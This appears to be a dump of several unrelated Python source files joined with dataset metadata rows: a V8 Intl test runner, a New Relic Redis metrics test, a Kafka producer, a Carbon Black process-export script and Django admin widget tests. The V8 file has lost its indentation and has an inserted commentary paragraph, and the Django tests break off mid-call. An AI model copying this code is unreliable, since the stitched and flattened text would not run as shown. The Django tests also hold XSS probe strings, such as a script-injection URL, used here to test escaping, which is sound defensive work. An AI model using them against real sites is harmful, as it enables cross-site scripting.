# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
from testrunner.local import testsuite
from testrunner.objects import testcase
class IntlTestSuite(testsuite.TestSuite):
def __init__(self, name, root):
super(IntlTestSuite, self).__init__(name, root)
def ListTests(self, context):
tests = []
for dirname, dirs, files in os.walk(self.root):
for dotted in [x for x in dirs if x.startswith('.')]:
dirs.remove(dotted)
dirs.sort()
files.sort()
for filename in files:
if (filename.endswith(".js") and filename != "assert.js" and
filename != "utils.js"):
testname = os.path.join(dirname[len(self.root) + 1:], filename[:-3])
test = testcase.TestCase(self, testname)
tests.append(test)
return tests
def GetFlagsForTestCase(self, testcase, context):
flags = ["--allow-natives-syntax"] + context.mode_flags
files = []
files.append(os.path.join(self.root, "assert.js"))
files.append(os.path.join(self.root, "utils.js"))
files.append(os.path.join(self.root, "date-format", "utils.js"))
files.append(os.path.join(self.root, testcase.path + self.suffix()))
flags += files
if context.isolates:
flags.append("--isolate")
flags += files
return testcase.flags + flags
def GetSuite(name, root):
return IntlTestSuite(name, root)
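ListTests above is essentially a filtered os.walk over the suite directory. The same traversal as a standalone generator, for reference (the function name is ours, not part of the V8 test runner):
import os

def list_js_tests(root):
    """Yield relative test names for every .js file under `root`, skipping the helper scripts."""
    for dirname, dirs, files in os.walk(root):
        dirs[:] = sorted(d for d in dirs if not d.startswith('.'))
        for filename in sorted(files):
            if filename.endswith('.js') and filename not in ('assert.js', 'utils.js'):
                yield os.path.join(dirname[len(root) + 1:], filename[:-3])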
| 39.794521 | 78 | 0.712909 |
8f570101d1f919766d1bb429758857e1be19160d | 4,133 | py | Python | tests/datastore_redis/test_multiple_dbs.py | newrelic/newrelic-python-agen | 4f292ec1219c0daffc5721a7b3a245b97d0f83ba | ["Apache-2.0"] | 92 | 2020-06-12T17:53:23.000Z | 2022-03-01T11:13:21.000Z | tests/datastore_redis/test_multiple_dbs.py | newrelic/newrelic-python-agen | 4f292ec1219c0daffc5721a7b3a245b97d0f83ba | ["Apache-2.0"] | 347 | 2020-07-10T00:10:19.000Z | 2022-03-31T17:58:56.000Z | tests/datastore_redis/test_multiple_dbs.py | newrelic/newrelic-python-agen | 4f292ec1219c0daffc5721a7b3a245b97d0f83ba | ["Apache-2.0"] | 58 | 2020-06-17T13:51:57.000Z | 2022-03-06T14:26:53.000Z |
# Copyright 2010 New Relic, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import redis
from newrelic.api.background_task import background_task
from testing_support.fixtures import (validate_transaction_metrics,
override_application_settings)
from testing_support.db_settings import redis_settings
from testing_support.util import instance_hostname
DB_MULTIPLE_SETTINGS = redis_settings()
# Settings
_enable_instance_settings = {
'datastore_tracer.instance_reporting.enabled': True,
}
_disable_instance_settings = {
'datastore_tracer.instance_reporting.enabled': False,
}
# Metrics
_base_scoped_metrics = (
('Datastore/operation/Redis/get', 1),
('Datastore/operation/Redis/set', 1),
('Datastore/operation/Redis/client_list', 1),
)
_base_rollup_metrics = (
('Datastore/all', 3),
('Datastore/allOther', 3),
('Datastore/Redis/all', 3),
('Datastore/Redis/allOther', 3),
('Datastore/operation/Redis/get', 1),
    ('Datastore/operation/Redis/set', 1),
('Datastore/operation/Redis/client_list', 1),
)
_disable_scoped_metrics = list(_base_scoped_metrics)
_disable_rollup_metrics = list(_base_rollup_metrics)
_enable_scoped_metrics = list(_base_scoped_metrics)
_enable_rollup_metrics = list(_base_rollup_metrics)
if len(DB_MULTIPLE_SETTINGS) > 1:
redis_1 = DB_MULTIPLE_SETTINGS[0]
redis_2 = DB_MULTIPLE_SETTINGS[1]
host_1 = instance_hostname(redis_1['host'])
port_1 = redis_1['port']
host_2 = instance_hostname(redis_2['host'])
port_2 = redis_2['port']
instance_metric_name_1 = 'Datastore/instance/Redis/%s/%s' % (host_1, port_1)
instance_metric_name_2 = 'Datastore/instance/Redis/%s/%s' % (host_2, port_2)
_enable_rollup_metrics.extend([
(instance_metric_name_1, 2),
(instance_metric_name_2, 1),
])
_disable_rollup_metrics.extend([
(instance_metric_name_1, None),
(instance_metric_name_2, None),
])
def exercise_redis(client_1, client_2):
client_1.set('key', 'value')
client_1.get('key')
client_2.execute_command('CLIENT', 'LIST', parse='LIST')
@pytest.mark.skipif(len(DB_MULTIPLE_SETTINGS) < 2,
reason='Test environment not configured with multiple databases.')
@override_application_settings(_enable_instance_settings)
@validate_transaction_metrics('test_multiple_dbs:test_multiple_datastores_enabled',
scoped_metrics=_enable_scoped_metrics,
rollup_metrics=_enable_rollup_metrics,
background_task=True)
@background_task()
def test_multiple_datastores_enabled():
redis1 = DB_MULTIPLE_SETTINGS[0]
redis2 = DB_MULTIPLE_SETTINGS[1]
client_1 = redis.StrictRedis(host=redis1['host'], port=redis1['port'], db=0)
client_2 = redis.StrictRedis(host=redis2['host'], port=redis2['port'], db=1)
exercise_redis(client_1, client_2)
@pytest.mark.skipif(len(DB_MULTIPLE_SETTINGS) < 2,
reason='Test environment not configured with multiple databases.')
@override_application_settings(_disable_instance_settings)
@validate_transaction_metrics('test_multiple_dbs:test_multiple_datastores_disabled',
scoped_metrics=_disable_scoped_metrics,
rollup_metrics=_disable_rollup_metrics,
background_task=True)
@background_task()
def test_multiple_datastores_disabled():
redis1 = DB_MULTIPLE_SETTINGS[0]
redis2 = DB_MULTIPLE_SETTINGS[1]
client_1 = redis.StrictRedis(host=redis1['host'], port=redis1['port'], db=0)
client_2 = redis.StrictRedis(host=redis2['host'], port=redis2['port'], db=1)
exercise_redis(client_1, client_2)
| 34.441667 | 84 | 0.739656 |
a46decdd077a08dce6b0d6f206a63de089489592 | 211 | py | Python | web/producer.py | itamarsky/devops-tasks | c3fa44c4825f5157c78c9853d153946e37f33bca | ["MIT"] | null | null | null | web/producer.py | itamarsky/devops-tasks | c3fa44c4825f5157c78c9853d153946e37f33bca | ["MIT"] | null | null | null | web/producer.py | itamarsky/devops-tasks | c3fa44c4825f5157c78c9853d153946e37f33bca | ["MIT"] | null | null | null |
from kafka import KafkaProducer
import json
def producer():
return KafkaProducer(security_protocol="PLAINTEXT", value_serializer=lambda v: json.dumps(v).encode('utf-8'), bootstrap_servers=['kafka:9092'])
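For reference, a hedged usage sketch of the producer above with kafka-python; the topic name and payload are assumptions, and the import assumes the module above is on the Python path:
from producer import producer  # the module above

p = producer()                      # connects to kafka:9092
p.send('events', {'status': 'ok'})  # value_serializer turns the dict into JSON bytes
p.flush()                           # block until buffered messages are delivered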
| 26.375 | 147 | 0.772512 |
75ae387568013a16b49212fc9a709fa2d5a51cea | 2,096 | py | Python | examples/threathunter/process_exporter.py | rathnadeep/cbapi-python | 55375d8796a9d88d00bd16df13d71a2d8d76dd9c | ["MIT"] | null | null | null | examples/threathunter/process_exporter.py | rathnadeep/cbapi-python | 55375d8796a9d88d00bd16df13d71a2d8d76dd9c | ["MIT"] | null | null | null | examples/threathunter/process_exporter.py | rathnadeep/cbapi-python | 55375d8796a9d88d00bd16df13d71a2d8d76dd9c | ["MIT"] | null | null | null |
#!/usr/bin/env python
import sys
from cbapi.example_helpers import build_cli_parser, get_cb_threathunter_object
from cbapi.psc.threathunter import Process
import json
import csv
def main():
parser = build_cli_parser("Query processes")
parser.add_argument("-p", type=str, help="process guid", default=None)
parser.add_argument("-q",type=str,help="query string",default=None)
parser.add_argument("-s",type=bool, help="silent mode",default=False)
parser.add_argument("-n", type=int, help="only output N events", default=None)
parser.add_argument("-f", type=str, help="output file name",default=None)
parser.add_argument("-of", type=str,help="output file format: csv or json",default="json")
args = parser.parse_args()
cb = get_cb_threathunter_object(args)
if not args.p and not args.q:
print("Error: Missing Process GUID to search for events with")
sys.exit(1)
if args.q:
processes = cb.select(Process).where(args.q)
else:
processes = cb.select(Process).where(process_guid=args.p)
if args.n:
processes = [ p for p in processes[0:args.n]]
if not args.s:
for process in processes:
print("Process: {}".format(process.process_name))
print("\tPIDs: {}".format(process.process_pids))
print("\tSHA256: {}".format(process.process_sha256))
print("\tGUID: {}".format(process.process_guid))
if args.f is not None:
if args.of == "json":
with open(args.f, 'w') as outfile:
for p in processes:
json.dump(p.original_document, outfile, indent = 4)
else:
with open(args.f, 'w') as outfile:
csvwriter = csv.writer(outfile)
for p in processes:
csvwriter.writerow(p.original_document)
if __name__ == "__main__":
sys.exit(main())
| 37.428571 | 97 | 0.574905 |
1bb4c9a9b142776cd3e71da160e067bdf50a61a2 | 64,601 | py | Python | tests/admin_widgets/tests.py | stevenheroo/django | 676bd084f2509f4201561d5c77ed4ecbd157bfa0 | ["BSD-3-Clause", "0BSD"] | null | null | null | tests/admin_widgets/tests.py | stevenheroo/django | 676bd084f2509f4201561d5c77ed4ecbd157bfa0 | ["BSD-3-Clause", "0BSD"] | 1 | 2021-05-19T06:22:48.000Z | 2021-05-19T06:22:48.000Z | tests/admin_widgets/tests.py | stevenheroo/django | 676bd084f2509f4201561d5c77ed4ecbd157bfa0 | ["BSD-3-Clause", "0BSD"] | 2 | 2021-10-13T10:49:28.000Z | 2021-11-30T12:33:33.000Z |
import gettext
import os
import re
from datetime import datetime, timedelta
from importlib import import_module
import pytz
from django import forms
from django.conf import settings
from django.contrib import admin
from django.contrib.admin import widgets
from django.contrib.admin.tests import AdminSeleniumTestCase
from django.contrib.auth.models import User
from django.core.files.storage import default_storage
from django.core.files.uploadedfile import SimpleUploadedFile
from django.db.models import (
CharField, DateField, DateTimeField, ManyToManyField, UUIDField,
)
from django.test import SimpleTestCase, TestCase, override_settings
from django.urls import reverse
from django.utils import translation
from .models import (
Advisor, Album, Band, Bee, Car, Company, Event, Honeycomb, Individual,
Inventory, Member, MyFileField, Profile, School, Student,
UnsafeLimitChoicesTo, VideoStream,
)
from .widgetadmin import site as widget_admin_site
class TestDataMixin:
@classmethod
def setUpTestData(cls):
cls.superuser = User.objects.create_superuser(username='super', password='secret', email=None)
cls.u2 = User.objects.create_user(username='testser', password='secret')
Car.objects.create(owner=cls.superuser, make='Volkswagen', model='Passat')
Car.objects.create(owner=cls.u2, make='BMW', model='M3')
class AdminFormfieldForDBFieldTests(SimpleTestCase):
"""
Tests for correct behavior of ModelAdmin.formfield_for_dbfield
"""
def assertFormfield(self, model, fieldname, widgetclass, **admin_overrides):
"""
Helper to call formfield_for_dbfield for a given model and field name
and verify that the returned formfield is appropriate.
"""
# Override any settings on the model admin
class MyModelAdmin(admin.ModelAdmin):
pass
for k in admin_overrides:
setattr(MyModelAdmin, k, admin_overrides[k])
# Construct the admin, and ask it for a formfield
ma = MyModelAdmin(model, admin.site)
ff = ma.formfield_for_dbfield(model._meta.get_field(fieldname), request=None)
# "unwrap" the widget wrapper, if needed
if isinstance(ff.widget, widgets.RelatedFieldWidgetWrapper):
widget = ff.widget.widget
else:
widget = ff.widget
self.assertIsInstance(widget, widgetclass)
# Return the formfield so that other tests can continue
return ff
def test_DateField(self):
self.assertFormfield(Event, 'start_date', widgets.AdminDateWidget)
def test_DateTimeField(self):
self.assertFormfield(Member, 'birthdate', widgets.AdminSplitDateTime)
def test_TimeField(self):
self.assertFormfield(Event, 'start_time', widgets.AdminTimeWidget)
def test_TextField(self):
self.assertFormfield(Event, 'description', widgets.AdminTextareaWidget)
def test_URLField(self):
self.assertFormfield(Event, 'link', widgets.AdminURLFieldWidget)
def test_IntegerField(self):
self.assertFormfield(Event, 'min_age', widgets.AdminIntegerFieldWidget)
def test_CharField(self):
self.assertFormfield(Member, 'name', widgets.AdminTextInputWidget)
def test_EmailField(self):
self.assertFormfield(Member, 'email', widgets.AdminEmailInputWidget)
def test_FileField(self):
self.assertFormfield(Album, 'cover_art', widgets.AdminFileWidget)
def test_ForeignKey(self):
self.assertFormfield(Event, 'main_band', forms.Select)
def test_raw_id_ForeignKey(self):
self.assertFormfield(Event, 'main_band', widgets.ForeignKeyRawIdWidget,
raw_id_fields=['main_band'])
def test_radio_fields_ForeignKey(self):
ff = self.assertFormfield(Event, 'main_band', widgets.AdminRadioSelect,
radio_fields={'main_band': admin.VERTICAL})
self.assertIsNone(ff.empty_label)
def test_many_to_many(self):
self.assertFormfield(Band, 'members', forms.SelectMultiple)
def test_raw_id_many_to_many(self):
self.assertFormfield(Band, 'members', widgets.ManyToManyRawIdWidget,
raw_id_fields=['members'])
def test_filtered_many_to_many(self):
self.assertFormfield(Band, 'members', widgets.FilteredSelectMultiple,
filter_vertical=['members'])
def test_formfield_overrides(self):
self.assertFormfield(Event, 'start_date', forms.TextInput,
formfield_overrides={DateField: {'widget': forms.TextInput}})
def test_formfield_overrides_widget_instances(self):
"""
Widget instances in formfield_overrides are not shared between
different fields. (#19423)
"""
class BandAdmin(admin.ModelAdmin):
formfield_overrides = {
CharField: {'widget': forms.TextInput(attrs={'size': '10'})}
}
ma = BandAdmin(Band, admin.site)
f1 = ma.formfield_for_dbfield(Band._meta.get_field('name'), request=None)
f2 = ma.formfield_for_dbfield(Band._meta.get_field('style'), request=None)
self.assertNotEqual(f1.widget, f2.widget)
self.assertEqual(f1.widget.attrs['maxlength'], '100')
self.assertEqual(f2.widget.attrs['maxlength'], '20')
self.assertEqual(f2.widget.attrs['size'], '10')
def test_formfield_overrides_m2m_filter_widget(self):
"""
The autocomplete_fields, raw_id_fields, filter_vertical, and
filter_horizontal widgets for ManyToManyFields may be overridden by
specifying a widget in formfield_overrides.
"""
class BandAdmin(admin.ModelAdmin):
filter_vertical = ['members']
formfield_overrides = {
ManyToManyField: {'widget': forms.CheckboxSelectMultiple},
}
ma = BandAdmin(Band, admin.site)
field = ma.formfield_for_dbfield(Band._meta.get_field('members'), request=None)
self.assertIsInstance(field.widget.widget, forms.CheckboxSelectMultiple)
def test_formfield_overrides_for_datetime_field(self):
"""
Overriding the widget for DateTimeField doesn't overrides the default
form_class for that field (#26449).
"""
class MemberAdmin(admin.ModelAdmin):
formfield_overrides = {DateTimeField: {'widget': widgets.AdminSplitDateTime}}
ma = MemberAdmin(Member, admin.site)
f1 = ma.formfield_for_dbfield(Member._meta.get_field('birthdate'), request=None)
self.assertIsInstance(f1.widget, widgets.AdminSplitDateTime)
self.assertIsInstance(f1, forms.SplitDateTimeField)
def test_formfield_overrides_for_custom_field(self):
"""
formfield_overrides works for a custom field class.
"""
class AlbumAdmin(admin.ModelAdmin):
formfield_overrides = {MyFileField: {'widget': forms.TextInput()}}
ma = AlbumAdmin(Member, admin.site)
f1 = ma.formfield_for_dbfield(Album._meta.get_field('backside_art'), request=None)
self.assertIsInstance(f1.widget, forms.TextInput)
def test_field_with_choices(self):
self.assertFormfield(Member, 'gender', forms.Select)
def test_choices_with_radio_fields(self):
self.assertFormfield(Member, 'gender', widgets.AdminRadioSelect,
radio_fields={'gender': admin.VERTICAL})
def test_inheritance(self):
self.assertFormfield(Album, 'backside_art', widgets.AdminFileWidget)
def test_m2m_widgets(self):
"""m2m fields help text as it applies to admin app (#9321)."""
class AdvisorAdmin(admin.ModelAdmin):
filter_vertical = ['companies']
self.assertFormfield(Advisor, 'companies', widgets.FilteredSelectMultiple,
filter_vertical=['companies'])
ma = AdvisorAdmin(Advisor, admin.site)
f = ma.formfield_for_dbfield(Advisor._meta.get_field('companies'), request=None)
self.assertEqual(
f.help_text,
'Hold down “Control”, or “Command” on a Mac, to select more than one.'
)
@override_settings(ROOT_URLCONF='admin_widgets.urls')
class AdminFormfieldForDBFieldWithRequestTests(TestDataMixin, TestCase):
def test_filter_choices_by_request_user(self):
"""
Ensure the user can only see their own cars in the foreign key dropdown.
"""
self.client.force_login(self.superuser)
response = self.client.get(reverse('admin:admin_widgets_cartire_add'))
self.assertNotContains(response, "BMW M3")
self.assertContains(response, "Volkswagen Passat")
@override_settings(ROOT_URLCONF='admin_widgets.urls')
class AdminForeignKeyWidgetChangeList(TestDataMixin, TestCase):
def setUp(self):
self.client.force_login(self.superuser)
def test_changelist_ForeignKey(self):
response = self.client.get(reverse('admin:admin_widgets_car_changelist'))
self.assertContains(response, '/auth/user/add/')
@override_settings(ROOT_URLCONF='admin_widgets.urls')
class AdminForeignKeyRawIdWidget(TestDataMixin, TestCase):
def setUp(self):
self.client.force_login(self.superuser)
def test_nonexistent_target_id(self):
band = Band.objects.create(name='Bogey Blues')
pk = band.pk
band.delete()
post_data = {
"main_band": str(pk),
}
# Try posting with a nonexistent pk in a raw id field: this
# should result in an error message, not a server exception.
response = self.client.post(reverse('admin:admin_widgets_event_add'), post_data)
self.assertContains(response, 'Select a valid choice. That choice is not one of the available choices.')
def test_invalid_target_id(self):
for test_str in ('Iñtërnâtiônàlizætiøn', "1234'", -1234):
# This should result in an error message, not a server exception.
response = self.client.post(reverse('admin:admin_widgets_event_add'), {"main_band": test_str})
self.assertContains(response, 'Select a valid choice. That choice is not one of the available choices.')
def test_url_params_from_lookup_dict_any_iterable(self):
lookup1 = widgets.url_params_from_lookup_dict({'color__in': ('red', 'blue')})
lookup2 = widgets.url_params_from_lookup_dict({'color__in': ['red', 'blue']})
self.assertEqual(lookup1, {'color__in': 'red,blue'})
self.assertEqual(lookup1, lookup2)
def test_url_params_from_lookup_dict_callable(self):
def my_callable():
return 'works'
lookup1 = widgets.url_params_from_lookup_dict({'myfield': my_callable})
lookup2 = widgets.url_params_from_lookup_dict({'myfield': my_callable()})
self.assertEqual(lookup1, lookup2)
def test_label_and_url_for_value_invalid_uuid(self):
field = Bee._meta.get_field('honeycomb')
self.assertIsInstance(field.target_field, UUIDField)
widget = widgets.ForeignKeyRawIdWidget(field.remote_field, admin.site)
self.assertEqual(widget.label_and_url_for_value('invalid-uuid'), ('', ''))
class FilteredSelectMultipleWidgetTest(SimpleTestCase):
def test_render(self):
# Backslash in verbose_name to ensure it is JavaScript escaped.
w = widgets.FilteredSelectMultiple('test\\', False)
self.assertHTMLEqual(
w.render('test', 'test'),
'<select multiple name="test" class="selectfilter" '
'data-field-name="test\\" data-is-stacked="0">\n</select>'
)
def test_stacked_render(self):
# Backslash in verbose_name to ensure it is JavaScript escaped.
w = widgets.FilteredSelectMultiple('test\\', True)
self.assertHTMLEqual(
w.render('test', 'test'),
'<select multiple name="test" class="selectfilterstacked" '
'data-field-name="test\\" data-is-stacked="1">\n</select>'
)
class AdminDateWidgetTest(SimpleTestCase):
def test_attrs(self):
w = widgets.AdminDateWidget()
self.assertHTMLEqual(
w.render('test', datetime(2007, 12, 1, 9, 30)),
'<input value="2007-12-01" type="text" class="vDateField" name="test" size="10">',
)
# pass attrs to widget
w = widgets.AdminDateWidget(attrs={'size': 20, 'class': 'myDateField'})
self.assertHTMLEqual(
w.render('test', datetime(2007, 12, 1, 9, 30)),
'<input value="2007-12-01" type="text" class="myDateField" name="test" size="20">',
)
class AdminTimeWidgetTest(SimpleTestCase):
def test_attrs(self):
w = widgets.AdminTimeWidget()
self.assertHTMLEqual(
w.render('test', datetime(2007, 12, 1, 9, 30)),
'<input value="09:30:00" type="text" class="vTimeField" name="test" size="8">',
)
# pass attrs to widget
w = widgets.AdminTimeWidget(attrs={'size': 20, 'class': 'myTimeField'})
self.assertHTMLEqual(
w.render('test', datetime(2007, 12, 1, 9, 30)),
'<input value="09:30:00" type="text" class="myTimeField" name="test" size="20">',
)
class AdminSplitDateTimeWidgetTest(SimpleTestCase):
def test_render(self):
w = widgets.AdminSplitDateTime()
self.assertHTMLEqual(
w.render('test', datetime(2007, 12, 1, 9, 30)),
'<p class="datetime">'
'Date: <input value="2007-12-01" type="text" class="vDateField" '
'name="test_0" size="10"><br>'
'Time: <input value="09:30:00" type="text" class="vTimeField" '
'name="test_1" size="8"></p>'
)
def test_localization(self):
w = widgets.AdminSplitDateTime()
with translation.override('de-at'):
w.is_localized = True
self.assertHTMLEqual(
w.render('test', datetime(2007, 12, 1, 9, 30)),
'<p class="datetime">'
'Datum: <input value="01.12.2007" type="text" '
'class="vDateField" name="test_0"size="10"><br>'
'Zeit: <input value="09:30:00" type="text" class="vTimeField" '
'name="test_1" size="8"></p>'
)
class AdminURLWidgetTest(SimpleTestCase):
def test_get_context_validates_url(self):
w = widgets.AdminURLFieldWidget()
for invalid in ['', '/not/a/full/url/', 'javascript:alert("Danger XSS!")']:
with self.subTest(url=invalid):
self.assertFalse(w.get_context('name', invalid, {})['url_valid'])
self.assertTrue(w.get_context('name', 'http://example.com', {})['url_valid'])
def test_render(self):
w = widgets.AdminURLFieldWidget()
self.assertHTMLEqual(
w.render('test', ''),
'<input class="vURLField" name="test" type="url">'
)
self.assertHTMLEqual(
w.render('test', 'http://example.com'),
'<p class="url">Currently:<a href="http://example.com">'
'http://example.com</a><br>'
'Change:<input class="vURLField" name="test" type="url" '
'value="http://example.com"></p>'
)
def test_render_idn(self):
w = widgets.AdminURLFieldWidget()
self.assertHTMLEqual(
w.render('test', 'http://example-äüö.com'),
'<p class="url">Currently: <a href="http://xn--example--7za4pnc.com">'
'http://example-äüö.com</a><br>'
'Change:<input class="vURLField" name="test" type="url" '
'value="http://example-äüö.com"></p>'
)
def test_render_quoting(self):
"""
WARNING: This test doesn't use assertHTMLEqual since it will get rid
of some escapes which are tested here!
"""
HREF_RE = re.compile('href="([^"]+)"')
VALUE_RE = re.compile('value="([^"]+)"')
TEXT_RE = re.compile('<a[^>]+>([^>]+)</a>')
w = widgets.AdminURLFieldWidget()
output = w.render('test', 'http://example.com/<sometag>some-text</sometag>')
self.assertEqual(
HREF_RE.search(output)[1],
'http://example.com/%3Csometag%3Esome-text%3C/sometag%3E',
)
self.assertEqual(
TEXT_RE.search(output)[1],
'http://example.com/<sometag>some-text</sometag>',
)
self.assertEqual(
VALUE_RE.search(output)[1],
'http://example.com/<sometag>some-text</sometag>',
)
output = w.render('test', 'http://example-äüö.com/<sometag>some-text</sometag>')
self.assertEqual(
HREF_RE.search(output)[1],
'http://xn--example--7za4pnc.com/%3Csometag%3Esome-text%3C/sometag%3E',
)
self.assertEqual(
TEXT_RE.search(output)[1],
'http://example-äüö.com/<sometag>some-text</sometag>',
)
self.assertEqual(
VALUE_RE.search(output)[1],
'http://example-äüö.com/<sometag>some-text</sometag>',
)
output = w.render('test', 'http://www.example.com/%C3%A4"><script>alert("XSS!")</script>"')
self.assertEqual(
HREF_RE.search(output)[1],
'http://www.example.com/%C3%A4%22%3E%3Cscript%3Ealert(%22XSS!%22)%3C/script%3E%22',
)
self.assertEqual(
TEXT_RE.search(output)[1],
'http://www.example.com/%C3%A4"><script>'
'alert("XSS!")</script>"'
)
self.assertEqual(
VALUE_RE.search(output)[1],
'http://www.example.com/%C3%A4"><script>alert("XSS!")</script>"',
)
class AdminUUIDWidgetTests(SimpleTestCase):
def test_attrs(self):
w = widgets.AdminUUIDInputWidget()
self.assertHTMLEqual(
w.render('test', '550e8400-e29b-41d4-a716-446655440000'),
'<input value="550e8400-e29b-41d4-a716-446655440000" type="text" class="vUUIDField" name="test">',
)
w = widgets.AdminUUIDInputWidget(attrs={'class': 'myUUIDInput'})
self.assertHTMLEqual(
w.render('test', '550e8400-e29b-41d4-a716-446655440000'),
'<input value="550e8400-e29b-41d4-a716-446655440000" type="text" class="myUUIDInput" name="test">',
)
@override_settings(ROOT_URLCONF='admin_widgets.urls')
class AdminFileWidgetTests(TestDataMixin, TestCase):
@classmethod
def setUpTestData(cls):
super().setUpTestData()
band = Band.objects.create(name='Linkin Park')
cls.album = band.album_set.create(
name='Hybrid Theory', cover_art=r'albums\hybrid_theory.jpg'
)
def test_render(self):
w = widgets.AdminFileWidget()
self.assertHTMLEqual(
w.render('test', self.album.cover_art),
'<p class="file-upload">Currently: <a href="%(STORAGE_URL)salbums/'
r'hybrid_theory.jpg">albums\hybrid_theory.jpg</a> '
'<span class="clearable-file-input">'
'<input type="checkbox" name="test-clear" id="test-clear_id"> '
'<label for="test-clear_id">Clear</label></span><br>'
'Change: <input type="file" name="test"></p>' % {
'STORAGE_URL': default_storage.url(''),
},
)
self.assertHTMLEqual(
w.render('test', SimpleUploadedFile('test', b'content')),
'<input type="file" name="test">',
)
def test_render_required(self):
widget = widgets.AdminFileWidget()
widget.is_required = True
self.assertHTMLEqual(
widget.render('test', self.album.cover_art),
'<p class="file-upload">Currently: <a href="%(STORAGE_URL)salbums/'
r'hybrid_theory.jpg">albums\hybrid_theory.jpg</a><br>'
'Change: <input type="file" name="test"></p>' % {
'STORAGE_URL': default_storage.url(''),
},
)
def test_render_disabled(self):
widget = widgets.AdminFileWidget(attrs={'disabled': True})
self.assertHTMLEqual(
widget.render('test', self.album.cover_art),
'<p class="file-upload">Currently: <a href="%(STORAGE_URL)salbums/'
r'hybrid_theory.jpg">albums\hybrid_theory.jpg</a> '
'<span class="clearable-file-input">'
'<input type="checkbox" name="test-clear" id="test-clear_id" disabled>'
'<label for="test-clear_id">Clear</label></span><br>'
'Change: <input type="file" name="test" disabled></p>' % {
'STORAGE_URL': default_storage.url(''),
},
)
def test_readonly_fields(self):
"""
File widgets should render as a link when they're marked "read only."
"""
self.client.force_login(self.superuser)
response = self.client.get(reverse('admin:admin_widgets_album_change', args=(self.album.id,)))
self.assertContains(
response,
'<div class="readonly"><a href="%(STORAGE_URL)salbums/hybrid_theory.jpg">'
r'albums\hybrid_theory.jpg</a></div>' % {'STORAGE_URL': default_storage.url('')},
html=True,
)
self.assertNotContains(
response,
'<input type="file" name="cover_art" id="id_cover_art">',
html=True,
)
response = self.client.get(reverse('admin:admin_widgets_album_add'))
self.assertContains(
response,
'<div class="readonly"></div>',
html=True,
)
@override_settings(ROOT_URLCONF='admin_widgets.urls')
class ForeignKeyRawIdWidgetTest(TestCase):
def test_render(self):
band = Band.objects.create(name='Linkin Park')
band.album_set.create(
name='Hybrid Theory', cover_art=r'albums\hybrid_theory.jpg'
)
rel = Album._meta.get_field('band').remote_field
w = widgets.ForeignKeyRawIdWidget(rel, widget_admin_site)
self.assertHTMLEqual(
w.render('test', band.uuid, attrs={}),
'<input type="text" name="test" value="%(banduuid)s" '
'class="vForeignKeyRawIdAdminField">'
'<a href="/admin_widgets/band/?_to_field=uuid" class="related-lookup" '
'id="lookup_id_test" title="Lookup"></a> <strong>'
'<a href="/admin_widgets/band/%(bandpk)s/change/">Linkin Park</a>'
'</strong>' % {'banduuid': band.uuid, 'bandpk': band.pk}
)
def test_relations_to_non_primary_key(self):
# ForeignKeyRawIdWidget works with fields which aren't related to
# the model's primary key.
apple = Inventory.objects.create(barcode=86, name='Apple')
Inventory.objects.create(barcode=22, name='Pear')
core = Inventory.objects.create(
barcode=87, name='Core', parent=apple
)
rel = Inventory._meta.get_field('parent').remote_field
w = widgets.ForeignKeyRawIdWidget(rel, widget_admin_site)
self.assertHTMLEqual(
w.render('test', core.parent_id, attrs={}),
'<input type="text" name="test" value="86" '
'class="vForeignKeyRawIdAdminField">'
'<a href="/admin_widgets/inventory/?_to_field=barcode" '
'class="related-lookup" id="lookup_id_test" title="Lookup"></a>'
' <strong><a href="/admin_widgets/inventory/%(pk)s/change/">'
'Apple</a></strong>' % {'pk': apple.pk}
)
def test_fk_related_model_not_in_admin(self):
# FK to a model not registered with admin site. Raw ID widget should
# have no magnifying glass link. See #16542
big_honeycomb = Honeycomb.objects.create(location='Old tree')
big_honeycomb.bee_set.create()
rel = Bee._meta.get_field('honeycomb').remote_field
w = widgets.ForeignKeyRawIdWidget(rel, widget_admin_site)
self.assertHTMLEqual(
w.render('honeycomb_widget', big_honeycomb.pk, attrs={}),
'<input type="text" name="honeycomb_widget" value="%(hcombpk)s">'
' <strong>%(hcomb)s</strong>'
% {'hcombpk': big_honeycomb.pk, 'hcomb': big_honeycomb}
)
def test_fk_to_self_model_not_in_admin(self):
# FK to self, not registered with admin site. Raw ID widget should have
# no magnifying glass link. See #16542
subject1 = Individual.objects.create(name='Subject #1')
Individual.objects.create(name='Child', parent=subject1)
rel = Individual._meta.get_field('parent').remote_field
w = widgets.ForeignKeyRawIdWidget(rel, widget_admin_site)
self.assertHTMLEqual(
w.render('individual_widget', subject1.pk, attrs={}),
'<input type="text" name="individual_widget" value="%(subj1pk)s">'
' <strong>%(subj1)s</strong>'
% {'subj1pk': subject1.pk, 'subj1': subject1}
)
def test_proper_manager_for_label_lookup(self):
# see #9258
rel = Inventory._meta.get_field('parent').remote_field
w = widgets.ForeignKeyRawIdWidget(rel, widget_admin_site)
hidden = Inventory.objects.create(
barcode=93, name='Hidden', hidden=True
)
child_of_hidden = Inventory.objects.create(
barcode=94, name='Child of hidden', parent=hidden
)
self.assertHTMLEqual(
w.render('test', child_of_hidden.parent_id, attrs={}),
'<input type="text" name="test" value="93" class="vForeignKeyRawIdAdminField">'
'<a href="/admin_widgets/inventory/?_to_field=barcode" '
'class="related-lookup" id="lookup_id_test" title="Lookup"></a>'
' <strong><a href="/admin_widgets/inventory/%(pk)s/change/">'
'Hidden</a></strong>' % {'pk': hidden.pk}
)
def test_render_unsafe_limit_choices_to(self):
rel = UnsafeLimitChoicesTo._meta.get_field('band').remote_field
w = widgets.ForeignKeyRawIdWidget(rel, widget_admin_site)
self.assertHTMLEqual(
w.render('test', None),
